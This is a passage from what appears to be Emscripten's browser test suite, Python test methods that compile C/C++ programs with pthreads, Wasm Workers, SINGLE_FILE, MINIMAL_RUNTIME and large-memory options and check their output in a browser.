# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@no_firefox('https://github.com/emscripten-core/emscripten/issues/16868')
@also_with_wasm2js
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/sync_xhr.cpp',
args=['-sFETCH_DEBUG', '-sFETCH', '--proxy-to-worker'])
# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
@unittest.skip("emscripten_fetch_wait relies on an asm.js-based web worker")
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/sync_fetch_in_main_thread.cpp', args=['-sFETCH_DEBUG', '-sFETCH', '-sWASM=0', '-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
@requires_threads
@disabled('https://github.com/emscripten-core/emscripten/issues/16746')
def test_fetch_idb_store(self):
self.btest_exit('fetch/idb_store.cpp', args=['-sUSE_PTHREADS', '-sFETCH', '-sWASM=0', '-sPROXY_TO_PTHREAD'])
@requires_threads
@disabled('https://github.com/emscripten-core/emscripten/issues/16746')
def test_fetch_idb_delete(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest_exit('fetch/idb_delete.cpp', args=['-sUSE_PTHREADS', '-sFETCH_DEBUG', '-sFETCH', '-sWASM=0', '-sPROXY_TO_PTHREAD'])
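# Test that locale support works in pthread builds.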
@requires_threads
def test_pthread_locale(self):
self.emcc_args.append('-I' + path_from_root('system/lib/libc/musl/src/internal'))
self.emcc_args.append('-I' + path_from_root('system/lib/pthread'))
for args in [
[],
['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest_exit('pthread/test_pthread_locale.c', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and
# emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest_exit('emscripten_set_canvas_element_size.c')
# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main
# thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
for args in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]:
self.btest_exit('emscripten_get_device_pixel_ratio.c', args=args)
# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
for args in [[], ['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD']]:
self.btest_exit(test_file('pthread/test_pthread_run_script.cpp'), args=['-O3'] + args)
# Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
@requires_threads
@requires_graphics_hardware
def test_emscripten_animate_canvas_element_size(self):
for args in [
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-sOFFSCREEN_FRAMEBUFFER'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-sOFFSCREEN_FRAMEBUFFER', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-sOFFSCREEN_FRAMEBUFFER'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS', '-sOFFSCREEN_FRAMEBUFFER', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-sOFFSCREENCANVAS_SUPPORT'],
]:
cmd = ['-lGL', '-O3', '-g2', '--shell-file', test_file('canvas_animate_resize_shell.html'), '-sGL_DEBUG', '--threadprofiler', '-sASSERTIONS'] + args
print(' '.join(cmd))
self.btest_exit('canvas_animate_resize.cpp', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@parameterized({
'': ([],),
'O3': (['-O3'],)
})
@requires_threads
def test_pthread_hello_thread(self, opts):
for modularize in [[], ['-sMODULARIZE', '-sEXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]:
self.btest_exit(test_file('pthread/hello_thread.c'), args=['-sUSE_PTHREADS'] + modularize + opts)
# Tests that a pthreads build of -sMINIMAL_RUNTIME works well in different build modes
@parameterized({
'': ([],),
'modularize': (['-sMODULARIZE', '-sEXPORT_NAME=MyModule'],),
'O3': (['-O3'],),
'O3_modularize': (['-O3', '-sMODULARIZE', '-sEXPORT_NAME=MyModule'],),
'O3_modularize_MINIMAL_RUNTIME_2': (['-O3', '-sMODULARIZE', '-sEXPORT_NAME=MyModule', '-sMINIMAL_RUNTIME=2'],),
})
def test_minimal_runtime_hello_thread(self, opts):
self.btest_exit(test_file('pthread/hello_thread.c'), args=['--closure=1', '-sMINIMAL_RUNTIME', '-sUSE_PTHREADS'] + opts)
# Tests memory growth in pthreads mode, but still on the main thread.
@requires_threads
def test_pthread_growth_mainthread(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest_exit(test_file('pthread/test_pthread_memory_growth_mainthread.c'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2', '-sALLOW_MEMORY_GROWTH', '-sINITIAL_MEMORY=32MB', '-sMAXIMUM_MEMORY=256MB'] + emcc_args, also_wasm2js=False)
run()
run(['-sPROXY_TO_PTHREAD'])
# Tests memory growth in a pthread.
@requires_threads
def test_pthread_growth(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest_exit(test_file('pthread/test_pthread_memory_growth.c'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=2', '-sALLOW_MEMORY_GROWTH', '-sINITIAL_MEMORY=32MB', '-sMAXIMUM_MEMORY=256MB', '-g'] + emcc_args, also_wasm2js=False)
run()
run(['-sASSERTIONS'])
run(['-sPROXY_TO_PTHREAD'])
# Tests that time in a pthread is relative to the main thread, so measurements
# on different threads are still monotonic, as if checking a single central
# clock.
@requires_threads
def test_pthread_reltime(self):
self.btest_exit(test_file('pthread/test_pthread_reltime.cpp'), args=['-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
@requires_threads
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
self.set_setting('EXIT_RUNTIME')
self.compile_btest([test_file('pthread/hello_thread.c'), '-sUSE_PTHREADS', '-o', 'hello_thread_with_blob_url.js'], reporting=Reporting.JS_ONLY)
shutil.copyfile(test_file('pthread/main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html')
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?exit:0')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
create_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
return 0;
}
''')
# generate a dummy file
create_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-sEXIT_RUNTIME', '-sMODULARIZE', '-sEXPORT_NAME="Foo"', '--preload-file', 'dummy_file', '-sSINGLE_FILE'])
create_file('a.html', '''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?exit:0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('single_file_static_initializer.cpp', '19', args=['-sSINGLE_FILE'], also_proxied=True)
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.mem')
# Tests that SINGLE_FILE works as intended in generated HTML with MINIMAL_RUNTIME
def test_minimal_runtime_single_file_html(self):
for wasm in [0, 1]:
for opts in [[], ['-O3']]:
self.btest('single_file_static_initializer.cpp', '19', args=opts + ['-sMINIMAL_RUNTIME', '-sSINGLE_FILE', '-sWASM=' + str(wasm)])
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.asm.js')
self.assertNotExists('test.mem')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933)
def test_single_file_in_web_environment_with_closure(self):
self.btest_exit('minimal_hello.c', args=['-sSINGLE_FILE', '-sENVIRONMENT=web', '-O2', '--closure=1'])
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
for wasm_enabled in [True, False]:
args = [test_file('browser_test_hello_world.c'), '-o', 'test.js', '-sSINGLE_FILE']
if not wasm_enabled:
args += ['-sWASM=0']
self.compile_btest(args)
create_file('test.html', '''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '--proxy-to-worker', '-sSINGLE_FILE'])
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
self.assertExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that pthreads code works as intended in a Worker. That is, a pthreads-using
# program can run either on the main thread (normal tests) or when we start it in
# a Worker in this test (in that case, both the main application thread and the worker threads
# are all inside Web Workers).
@requires_threads
def test_pthreads_started_in_worker(self):
self.set_setting('EXIT_RUNTIME')
self.compile_btest([test_file('pthread/test_pthread_atomics.cpp'), '-o', 'test.js', '-sINITIAL_MEMORY=64MB', '-sUSE_PTHREADS', '-sPTHREAD_POOL_SIZE=8'], reporting=Reporting.JS_ONLY)
create_file('test.html', '''
<script>
new Worker('test.js');
</script>
''')
self.run_browser('test.html', None, '/report_result?exit:0')
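# Test that a preloaded file remains accessible after the heap has grown.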
def test_access_file_after_heap_resize(self):
create_file('test.txt', 'hello from file')
self.btest_exit(test_file('access_file_after_heap_resize.c'), args=['-sALLOW_MEMORY_GROWTH', '--preload-file', 'test.txt'])
# with separate file packager invocation
self.run_process([FILE_PACKAGER, 'data.data', '--preload', 'test.txt', '--js-output=' + 'data.js'])
self.btest_exit(test_file('access_file_after_heap_resize.c'), args=['-sALLOW_MEMORY_GROWTH', '--pre-js', 'data.js', '-sFORCE_FILESYSTEM'])
def test_unicode_html_shell(self):
create_file('main.cpp', r'''
int main() {
return 0;
}
''')
create_file('shell.html', read_file(path_from_root('src/shell.html')).replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
self.btest_exit('main.cpp', args=['--shell-file', 'shell.html'])
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
self.btest_exit(test_file('pthread/emscripten_thread_sleep.c'), args=['-sUSE_PTHREADS', '-sEXPORTED_RUNTIME_METHODS=[print]'])
# Tests that Emscripten-compiled applications can be run from a relative path in the browser that is different from the address of the current page
def test_browser_run_from_different_directory(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-O3'])
ensure_dir('subdir')
shutil.move('test.js', Path('subdir/test.js'))
shutil.move('test.wasm', Path('subdir/test.wasm'))
src = read_file('test.html')
# Make sure JS is loaded from subdirectory
create_file('test-subdir.html', src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-sMODULARIZE`
def test_browser_run_from_different_directory_async(self):
for args, creations in [
(['-sMODULARIZE'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
]:
print(args)
# compile the code with the modularize feature enabled
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O3'] + args)
ensure_dir('subdir')
shutil.move('test.js', Path('subdir/test.js'))
shutil.move('test.wasm', Path('subdir/test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
create_file('test-subdir.html', '''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but
# here we also eval the initial code, so currentScript is not present. That prevents us
# from finding the file in a subdir, but here we at least check we do not regress compared to the
# normal case of finding in the current dir.
def test_browser_modularize_no_current_script(self):
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for path, args, creation in [
([], ['-sMODULARIZE'], 'Module();'),
(['subdir'], ['-sMODULARIZE'], 'Module();'),
]:
print(path, args, creation)
filesystem_path = os.path.join('.', *path)
ensure_dir(filesystem_path)
# compile the code with the modularize feature enabled
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js'] + args)
shutil.move('test.js', Path(filesystem_path, 'test.js'))
shutil.move('test.wasm', Path(filesystem_path, 'test.wasm'))
create_file(Path(filesystem_path, 'test.html'), '''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_emscripten_request_animation_frame(self):
self.btest_exit(test_file('emscripten_request_animation_frame.c'))
def test_emscripten_request_animation_frame_loop(self):
self.btest_exit(test_file('emscripten_request_animation_frame_loop.c'))
def test_request_animation_frame(self):
self.btest_exit('request_animation_frame.cpp', also_proxied=True)
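# Test emscripten_set_timeout() and emscripten_set_timeout_loop() in PROXY_TO_PTHREAD builds.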
@requires_threads
def test_emscripten_set_timeout(self):
self.btest_exit(test_file('emscripten_set_timeout.c'), args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
@requires_threads
def test_emscripten_set_timeout_loop(self):
self.btest_exit(test_file('emscripten_set_timeout_loop.c'), args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
def test_emscripten_set_immediate(self):
self.btest_exit(test_file('emscripten_set_immediate.c'))
def test_emscripten_set_immediate_loop(self):
self.btest_exit(test_file('emscripten_set_immediate_loop.c'))
@requires_threads
def test_emscripten_set_interval(self):
self.btest_exit(test_file('emscripten_set_interval.c'), args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
# Test emscripten_performance_now() and emscripten_date_now()
@requires_threads
def test_emscripten_performance_now(self):
self.btest(test_file('emscripten_performance_now.c'), '0', args=['-sUSE_PTHREADS', '-sPROXY_TO_PTHREAD'])
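# Test that embind works together with pthreads.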
@requires_threads
def test_embind_with_pthreads(self):
self.btest_exit(test_file('embind/test_pthreads.cpp'), args=['--bind', '-pthread', '-sPTHREAD_POOL_SIZE=2'])
def test_embind_with_asyncify(self):
self.btest('embind_with_asyncify.cpp', '1', args=['--bind', '-sASYNCIFY'])
# Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error()
def test_emscripten_console_log(self):
self.btest_exit(test_file('emscripten_console_log.c'), args=['--pre-js', test_file('emscripten_console_log_pre.js')])
def test_emscripten_throw_number(self):
self.btest(test_file('emscripten_throw_number.c'), '0', args=['--pre-js', test_file('emscripten_throw_number_pre.js')])
def test_emscripten_throw_string(self):
self.btest(test_file('emscripten_throw_string.c'), '0', args=['--pre-js', test_file('emscripten_throw_string_pre.js')])
# Tests that Closure run in combination with -sENVIRONMENT=web mode works with a minimal console.log() application
def test_closure_in_web_only_target_environment_console_log(self):
self.btest_exit('minimal_hello.c', args=['-sENVIRONMENT=web', '-O3', '--closure=1'])
# Tests that Closure run in combination with -sENVIRONMENT=web mode works with a small WebGL application
@requires_graphics_hardware
def test_closure_in_web_only_target_environment_webgl(self):
self.btest_exit('webgl_draw_triangle.c', args=['-lGL', '-sENVIRONMENT=web', '-O3', '--closure=1'])
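# Test -sDECLARE_ASM_MODULE_EXPORTS=0 in WASM=0 (asm.js) builds, with and without MINIMAL_RUNTIME.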
def test_no_declare_asm_module_exports_asmjs(self):
# TODO(sbc): Fix closure warnings with MODULARIZE + WASM=0
self.ldflags.remove('-sCLOSURE_WARNINGS=error')
for minimal_runtime in [[], ['-sMINIMAL_RUNTIME']]:
self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-sDECLARE_ASM_MODULE_EXPORTS=0', '-sENVIRONMENT=web', '-O3', '--closure=1', '-sWASM=0'] + minimal_runtime)
def test_no_declare_asm_module_exports_wasm_minimal_runtime(self):
for mode in [1, 2]:
self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-sDECLARE_ASM_MODULE_EXPORTS=0', '-sENVIRONMENT=web', '-O3', '--closure=1', f'-sMINIMAL_RUNTIME={mode}'])
# Tests that the different code paths in src/shell_minimal_runtime.html all work ok.
def test_minimal_runtime_loader_shell(self):
args = ['-sMINIMAL_RUNTIME=2']
for wasm in [[], ['-sWASM=0', '--memory-init-file', '0'], ['-sWASM=0', '--memory-init-file', '1'], ['-sSINGLE_FILE'], ['-sWASM=0', '-sSINGLE_FILE']]:
for modularize in [[], ['-sMODULARIZE']]:
print(str(args + wasm + modularize))
self.btest_exit('minimal_hello.c', args=args + wasm + modularize)
# Tests that -sMINIMAL_RUNTIME works well in different build modes
def test_minimal_runtime_hello_world(self):
for args in [
[],
['-sMINIMAL_RUNTIME_STREAMING_WASM_COMPILATION', '--closure=1'],
['-sMINIMAL_RUNTIME_STREAMING_WASM_INSTANTIATION', '--closure=1']
]:
self.btest_exit(test_file('small_hello_world.c'), args=args + ['-sMINIMAL_RUNTIME'])
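# Test that -sUSE_OFFSET_CONVERTER works together with source maps under PROXY_TO_PTHREAD.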
@requires_threads
def test_offset_converter(self, *args):
self.btest_exit(test_file('browser/test_offset_converter.c'), assert_returncode=1, args=['-sUSE_OFFSET_CONVERTER', '-gsource-map', '-sPROXY_TO_PTHREAD', '-sUSE_PTHREADS'])
# Tests emscripten_unwind_to_js_event_loop() behavior
def test_emscripten_unwind_to_js_event_loop(self, *args):
self.btest_exit(test_file('test_emscripten_unwind_to_js_event_loop.c'))
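# Test that a -sWASM=2 build runs with native wasm when available, and can fall back to the wasm2js (.wasm.js) output.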
def test_wasm2js_fallback(self):
self.set_setting('EXIT_RUNTIME')
for args in [[], ['-sMINIMAL_RUNTIME']]:
self.compile_btest([test_file('small_hello_world.c'), '-sWASM=2', '-o', 'test.html'] + args)
# First run with WebAssembly support enabled
# Move the Wasm2js fallback away to test it is not accidentally getting loaded.
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?exit:0')
os.rename('test.wasm.js.unused', 'test.wasm.js')
# Then disable WebAssembly support in the VM and try again. It should still work via the wasm2js fallback.
html = read_file('test.html')
html = html.replace('<body>', '<body><script>delete WebAssembly;</script>')
create_file('test.html', html)
os.remove('test.wasm') # Also delete the Wasm file to test that it is not attempted to be loaded.
self.run_browser('test.html', 'hello!', '/report_result?exit:0')
def test_wasm2js_fallback_on_wasm_compilation_failure(self):
self.set_setting('EXIT_RUNTIME')
for args in [[], ['-sMINIMAL_RUNTIME']]:
self.compile_btest([test_file('small_hello_world.c'), '-sWASM=2', '-o', 'test.html'] + args)
# Run without the .wasm.js file present: with Wasm support, the page should still run
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?exit:0')
# Restore the .wasm.js file, then corrupt the .wasm file, that should trigger the Wasm2js fallback to run
os.rename('test.wasm.js.unused', 'test.wasm.js')
shutil.copyfile('test.js', 'test.wasm')
self.run_browser('test.html', 'hello!', '/report_result?exit:0')
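# Test the system() function.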
def test_system(self):
self.btest_exit(test_file('system.c'))
# Tests the hello_wasm_worker.c documentation example code.
@also_with_minimal_runtime
def test_wasm_worker_hello(self):
self.btest(test_file('wasm_worker/hello_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS'])
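# Same as above, but with -sMINIMAL_RUNTIME=2.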
def test_wasm_worker_hello_minimal_runtime_2(self):
self.btest(test_file('wasm_worker/hello_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS', '-sMINIMAL_RUNTIME=2'])
# Tests Wasm Workers build in Wasm2JS mode.
@also_with_minimal_runtime
def test_wasm_worker_hello_wasm2js(self):
self.btest(test_file('wasm_worker/hello_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS', '-sWASM=0'])
# Tests the WASM_WORKERS=2 build mode, which embeds the Wasm Worker bootstrap JS script file to the main JS file.
@also_with_minimal_runtime
def test_wasm_worker_embedded(self):
self.btest(test_file('wasm_worker/hello_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS=2'])
# Tests Wasm Worker thread stack setup
@also_with_minimal_runtime
def test_wasm_worker_thread_stack(self):
for mode in [0, 1, 2]:
self.btest(test_file('wasm_worker/thread_stack.c'), expected='0', args=['-sWASM_WORKERS', f'-sSTACK_OVERFLOW_CHECK={mode}'])
# Tests emscripten_malloc_wasm_worker() and emscripten_current_thread_is_wasm_worker() functions
@also_with_minimal_runtime
def test_wasm_worker_malloc(self):
self.btest(test_file('wasm_worker/malloc_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests Wasm Worker+pthreads simultaneously
@also_with_minimal_runtime
def test_wasm_worker_and_pthreads(self):
self.btest(test_file('wasm_worker/wasm_worker_and_pthread.c'), expected='0', args=['-sWASM_WORKERS', '-pthread'])
# Tests emscripten_wasm_worker_self_id() function
@also_with_minimal_runtime
def test_wasm_worker_self_id(self):
self.btest(test_file('wasm_worker/wasm_worker_self_id.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests direct Wasm Assembly .S file based TLS variables in Wasm Workers
@also_with_minimal_runtime
def test_wasm_worker_tls_wasm_assembly(self):
self.btest(test_file('wasm_worker/wasm_worker_tls_wasm_assembly.c'),
expected='42', args=['-sWASM_WORKERS', test_file('wasm_worker/wasm_worker_tls_wasm_assembly.S')])
# Tests C++11 keyword thread_local for TLS in Wasm Workers
@also_with_minimal_runtime
def test_wasm_worker_cpp11_thread_local(self):
self.btest(test_file('wasm_worker/cpp11_thread_local.cpp'), expected='42', args=['-sWASM_WORKERS'])
# Tests C11 keyword _Thread_local for TLS in Wasm Workers
@also_with_minimal_runtime
def test_wasm_worker_c11__Thread_local(self):
self.btest(test_file('wasm_worker/c11__Thread_local.c'), expected='42', args=['-sWASM_WORKERS', '-std=gnu11']) # Cannot use -std=c11 because EM_ASM requires GNU extensions, so test with gnu11.
# Tests GCC specific extension keyword __thread for TLS in Wasm Workers
@also_with_minimal_runtime
def test_wasm_worker_gcc___thread(self):
self.btest(test_file('wasm_worker/gcc___Thread.c'), expected='42', args=['-sWASM_WORKERS', '-std=gnu11'])
# Tests emscripten_wasm_worker_sleep()
@also_with_minimal_runtime
def test_wasm_worker_sleep(self):
self.btest(test_file('wasm_worker/wasm_worker_sleep.c'), expected='1', args=['-sWASM_WORKERS'])
# Tests emscripten_terminate_wasm_worker()
@also_with_minimal_runtime
def test_wasm_worker_terminate(self):
self.btest(test_file('wasm_worker/terminate_wasm_worker.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_terminate_all_wasm_workers()
@also_with_minimal_runtime
def test_wasm_worker_terminate_all(self):
self.btest(test_file('wasm_worker/terminate_all_wasm_workers.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_wasm_worker_post_function_*() API
@also_with_minimal_runtime
def test_wasm_worker_post_function(self):
self.btest(test_file('wasm_worker/post_function.c'), expected='8', args=['-sWASM_WORKERS'])
# Tests emscripten_wasm_worker_post_function_*() API and EMSCRIPTEN_WASM_WORKER_ID_PARENT
# to send a message back from Worker to its parent thread.
@also_with_minimal_runtime
def test_wasm_worker_post_function_to_main_thread(self):
self.btest(test_file('wasm_worker/post_function_to_main_thread.c'), expected='10', args=['-sWASM_WORKERS'])
# Tests emscripten_navigator_hardware_concurrency() and emscripten_atomics_is_lock_free()
@also_with_minimal_runtime
def test_wasm_worker_hardware_concurrency_is_lock_free(self):
self.btest(test_file('wasm_worker/hardware_concurrency_is_lock_free.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_wasm_wait_i32() and emscripten_wasm_notify() functions.
@also_with_minimal_runtime
def test_wasm_worker_wait32_notify(self):
self.btest(test_file('wasm_worker/wait32_notify.c'), expected='2', args=['-sWASM_WORKERS'])
# Tests emscripten_wasm_wait_i64() and emscripten_wasm_notify() functions.
@also_with_minimal_runtime
def test_wasm_worker_wait64_notify(self):
self.btest(test_file('wasm_worker/wait64_notify.c'), expected='2', args=['-sWASM_WORKERS'])
# Tests emscripten_atomic_wait_async() function.
@also_with_minimal_runtime
def test_wasm_worker_wait_async(self):
self.btest(test_file('wasm_worker/wait_async.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_atomic_cancel_wait_async() function.
@also_with_minimal_runtime
def test_wasm_worker_cancel_wait_async(self):
self.btest(test_file('wasm_worker/cancel_wait_async.c'), expected='1', args=['-sWASM_WORKERS'])
# Tests emscripten_atomic_cancel_all_wait_asyncs() function.
@also_with_minimal_runtime
def test_wasm_worker_cancel_all_wait_asyncs(self):
self.btest(test_file('wasm_worker/cancel_all_wait_asyncs.c'), expected='1', args=['-sWASM_WORKERS'])
# Tests emscripten_atomic_cancel_all_wait_asyncs_at_address() function.
@also_with_minimal_runtime
def test_wasm_worker_cancel_all_wait_asyncs_at_address(self):
self.btest(test_file('wasm_worker/cancel_all_wait_asyncs_at_address.c'), expected='1', args=['-sWASM_WORKERS'])
# Tests emscripten_lock_init(), emscripten_lock_waitinf_acquire() and emscripten_lock_release()
@also_with_minimal_runtime
def test_wasm_worker_lock_waitinf(self):
self.btest(test_file('wasm_worker/lock_waitinf_acquire.c'), expected='4000', args=['-sWASM_WORKERS'])
# Tests emscripten_lock_wait_acquire() and emscripten_lock_try_acquire() in Worker.
@also_with_minimal_runtime
def test_wasm_worker_lock_wait(self):
self.btest(test_file('wasm_worker/lock_wait_acquire.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_lock_wait_acquire() between two Wasm Workers.
@also_with_minimal_runtime
def test_wasm_worker_lock_wait2(self):
self.btest(test_file('wasm_worker/lock_wait_acquire2.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_lock_async_acquire() function.
@also_with_minimal_runtime
def test_wasm_worker_lock_async_acquire(self):
self.btest(test_file('wasm_worker/lock_async_acquire.c'), expected='0', args=['--closure=1', '-sWASM_WORKERS'])
# Tests emscripten_lock_busyspin_wait_acquire() in Worker and main thread.
@also_with_minimal_runtime
def test_wasm_worker_lock_busyspin_wait(self):
self.btest(test_file('wasm_worker/lock_busyspin_wait_acquire.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_lock_busyspin_waitinf_acquire() in Worker and main thread.
@also_with_minimal_runtime
def test_wasm_worker_lock_busyspin_waitinf(self):
self.btest(test_file('wasm_worker/lock_busyspin_waitinf_acquire.c'), expected='1', args=['-sWASM_WORKERS'])
# Tests that proxied JS functions cannot be called from Wasm Workers
@also_with_minimal_runtime
def test_wasm_worker_no_proxied_js_functions(self):
self.btest(test_file('wasm_worker/no_proxied_js_functions.c'), expected='0',
args=['--js-library', test_file('wasm_worker/no_proxied_js_functions.js'), '-sWASM_WORKERS', '-sASSERTIONS'])
# Tests emscripten_semaphore_init(), emscripten_semaphore_waitinf_acquire() and emscripten_semaphore_release()
@also_with_minimal_runtime
def test_wasm_worker_semaphore_waitinf_acquire(self):
self.btest(test_file('wasm_worker/semaphore_waitinf_acquire.c'), expected='0', args=['-sWASM_WORKERS'])
# Tests emscripten_semaphore_try_acquire() on the main thread
@also_with_minimal_runtime
def test_wasm_worker_semaphore_try_acquire(self):
self.btest(test_file('wasm_worker/semaphore_try_acquire.c'), expected='0', args=['-sWASM_WORKERS'])
@no_firefox('no 4GB support yet')
@requires_v8
def test_zzz_zzz_4gb(self):
# TODO Convert to an actual browser test when it reaches stable.
# For now, keep this in browser as this suite runs serially, which
# means we don't compete for memory with anything else (and run it
# at the very very end, to reduce the risk of it OOM-killing the
# browser).
# test that we can allocate in the 2-4GB range, if we enable growth and
# set the max appropriately
self.emcc_args += ['-O2', '-sALLOW_MEMORY_GROWTH', '-sMAXIMUM_MEMORY=4GB']
self.do_run_in_out_file_test('browser', 'test_4GB.cpp')
# Tests that emmalloc supports up to 4GB Wasm heaps.
@no_firefox('no 4GB support yet')
def test_zzz_zzz_emmalloc_4gb(self):
self.btest(test_file('mem_growth.cpp'),
expected='-65536', # == 4*1024*1024*1024 - 65536 casted to signed
args=['-sMALLOC=emmalloc', '-sABORTING_MALLOC=0', '-sALLOW_MEMORY_GROWTH=1', '-sMAXIMUM_MEMORY=4GB'])
# Test that it is possible to malloc() a huge 3GB memory block in 4GB mode using emmalloc.
# Also test emmalloc-memvalidate and emmalloc-memvalidate-verbose build configurations.
@no_firefox('no 4GB support yet')
def test_emmalloc_3GB(self):
def test(args):
self.btest_exit(test_file('alloc_3gb.cpp'),
args=['-sMAXIMUM_MEMORY=4GB', '-sALLOW_MEMORY_GROWTH=1'] + args)
test(['-sMALLOC=emmalloc'])
test(['-sMALLOC=emmalloc-debug'])
test(['-sMALLOC=emmalloc-memvalidate'])
test(['-sMALLOC=emmalloc-memvalidate-verbose'])
@parameterized({
# the fetch backend works even on the main thread: we proxy to a background
# thread and busy-wait
'main_thread': (['-sPTHREAD_POOL_SIZE=4'],),
# using proxy_to_pthread also works, of course
'proxy_to_pthread': (['-sPROXY_TO_PTHREAD', '-sINITIAL_MEMORY=32MB', '-DPROXYING'],),
})
@requires_threads
def test_wasmfs_fetch_backend(self, args):
